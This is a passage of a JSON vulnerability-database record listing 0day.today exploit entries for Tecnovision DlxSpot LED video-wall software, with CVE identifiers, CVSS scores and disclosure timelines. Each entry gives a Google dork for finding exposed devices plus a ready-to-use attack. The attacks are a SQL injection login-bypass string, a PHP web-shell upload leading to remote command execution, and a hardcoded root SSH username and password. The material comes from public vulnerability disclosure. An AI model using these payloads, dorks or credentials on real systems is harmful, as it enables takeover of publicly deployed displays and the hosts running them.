interface login and is exploitable the following\nway:\n\nusername:admin\npassword:x' or 'x'='x\n\nTIMELINE:\n2017-05-14 - Discovery of vulnerabilities.\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\nhomepage.\n2017-06-01 - No response, tried contacting again through several contact\nforms on homepage.\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\nrequesting CVE assignment.\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\nemail in Italian to the company.\n2017-09-18 - No response, full public disclosure.\n\n DEDICATED TO MARCUS ASTROM\nFOREVER LOVED - NEVER FORGOTTEN", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-14T08:26:48", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2017-09-19T00:00:00", "type": "zdt", "title": "Tecnovision DLX Spot - Arbitrary File Upload Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929"], "modified": "2017-09-19T00:00:00", "href": "https://0day.today/exploit/description/28588", "id": "1337DAY-ID-28588", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload\r\nto RCE\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: >1.5.10\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\r\nall over the world, they are used in football arenas, concert halls,\r\nshopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12929\r\n# Linked CVE's: CVE-2017-12928, CVE-2017-12930.\r\n \r\n# Visit my github page at\r\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\r\nfor complete takeover of the box, from SQLi to root access.\r\n###############################################################################################################################\r\n \r\nArbitrary File Upload leading to Remote Command Execution:\r\n \r\n1. Visit http://host/resource.php and upload PHP shell. For example: <?php\r\nsystem($_GET[\"c\"]); ?>\r\n2. RCE via http://host/resource/source/shell.php?c=id\r\n3. Output: www-data\r\n \r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\r\nhomepage.\r\n2017-06-01 - No response, tried contacting again through several contact\r\nforms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\r\nrequesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\r\nemail in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n \r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/28588", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-06T01:38:06", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2017-09-19T00:00:00", "title": "Tecnovision DLX Spot - Authentication Bypass Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12930"], "modified": "2017-09-19T00:00:00", "href": "https://0day.today/exploit/description/28587", "id": "1337DAY-ID-28587", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL\r\nInjection\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: >1.5.10\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\r\nall over the world, they are used in football arenas, concert halls,\r\nshopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12930\r\n# Linked CVE's: CVE-2017-12928, CVE-2017-12929\r\n \r\n# Visit my github page at\r\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\r\nfor complete takeover of the box, from SQLi to full root access.\r\n###############################################################################################################################\r\n \r\nDlxSpot Player 4 above version 1.5.10 suffers from an SQL injection\r\nvulnerability in the admin interface login and is exploitable the following\r\nway:\r\n \r\nusername:admin\r\npassword:x' or 'x'='x\r\n \r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\r\nhomepage.\r\n2017-06-01 - No response, tried contacting again through several contact\r\nforms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\r\nrequesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\r\nemail in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n \r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\n\n# 0day.today [2018-03-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28587"}, {"lastseen": "2018-03-06T22:05:15", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2017-09-19T00:00:00", "title": "Tecnovision DLX Spot - SSH Backdoor Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12928"], "modified": "2017-09-19T00:00:00", "href": "https://0day.today/exploit/description/28586", "id": "1337DAY-ID-28586", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: All known versions\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12928\r\n# Linked CVE's: CVE-2017-12929, CVE-2017-12930\r\n \r\n# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.\r\n###############################################################################################################################\r\n \r\nHardcoded password for all dlxspot players, login with the following credentials via SSH\r\n \r\nusername: dlxuser\r\npassword: tecn0visi0n\r\n \r\nEscalate to root with the same password.\r\n \r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.\r\n2017-06-01 - No response, tried contacting again through several contact forms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n \r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28586"}]}
